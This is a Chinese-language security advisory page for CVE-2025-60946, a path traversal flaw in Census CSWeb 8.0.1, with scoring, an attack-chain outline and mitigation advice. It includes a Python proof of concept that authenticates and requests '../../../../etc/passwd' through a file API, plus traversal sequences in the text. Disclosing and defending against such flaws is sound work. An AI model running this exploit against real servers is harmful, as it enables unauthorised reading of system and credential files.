CVE-2025-60946 CVSS 8.8 高危

CVE-2025-60946: Census CSWeb 任意文件路径读取漏洞

披露日期: 2026-03-23

来源: 9119a7d8-5eab-497f-8521-727c672e3725

漏洞信息

漏洞编号

CVE-2025-60946

漏洞类型

路径穿越

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Census CSWeb

漏洞概述

Census CSWeb 8.0.1版本存在安全漏洞，允许任意文件路径输入。远程且经过身份验证的攻击者可利用此漏洞访问非预期的文件目录，可能导致敏感信息泄露。该问题已在8.1.0 alpha版本中修复。

技术细节

该漏洞的根本原因是Census CSWeb在处理文件操作请求时，缺乏对用户输入参数的有效安全校验。攻击者首先需要获取目标系统的低权限用户凭证，随后通过网络发送特制的HTTP数据包。数据包中包含路径遍历序列（例如“../”或“%2e%2e%2f”），旨在欺骗服务器将文件访问请求重定向到Web根目录之外。由于系统未能正确解析或拦截这些恶意路径，攻击者即可成功访问非预期的文件目录。这种漏洞不仅允许读取敏感配置信息，还可能结合其他攻击手段导致远程代码执行，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统为Census CSWeb 8.0.1版本。

STEP 2

获取凭证

攻击者获取一个低权限用户的合法登录凭证（满足PR:L要求）。

STEP 3

发送恶意请求

攻击者利用该凭证发送包含路径遍历字符（如../）的特制HTTP请求。

STEP 4

读取敏感数据

服务器未能过滤恶意路径，返回了非预期的文件内容，攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url, username, password):
    session = requests.Session()
    # Step 1: Authenticate to get a valid session (PR:L requirement)
    login_payload = {'username': username, 'password': password}
    login_resp = session.post(f"{target_url}/login", data=login_payload)
    if login_resp.status_code != 200:
        print("Authentication failed")
        return

    # Step 2: Send payload with path traversal
    # Attempting to read /etc/passwd on Linux
    traversal_payload = {'file': '../../../../etc/passwd'}
    exploit_resp = session.get(f"{target_url}/api/files", params=traversal_payload)

    if exploit_resp.status_code == 200:
        print("Exploit successful! Response:")
        print(exploit_resp.text)
    else:
        print(f"Exploit failed, status code: {exploit_resp.status_code}")

# Usage
# exploit('http://target-ip', 'attacker', 'password')

影响范围

Census CSWeb 8.0.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议通过网络防火墙或WAF拦截包含路径遍历特征的请求。同时，应严格审查并限制低权限用户的文件访问权限，确保账户仅拥有执行业务所需的最小权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表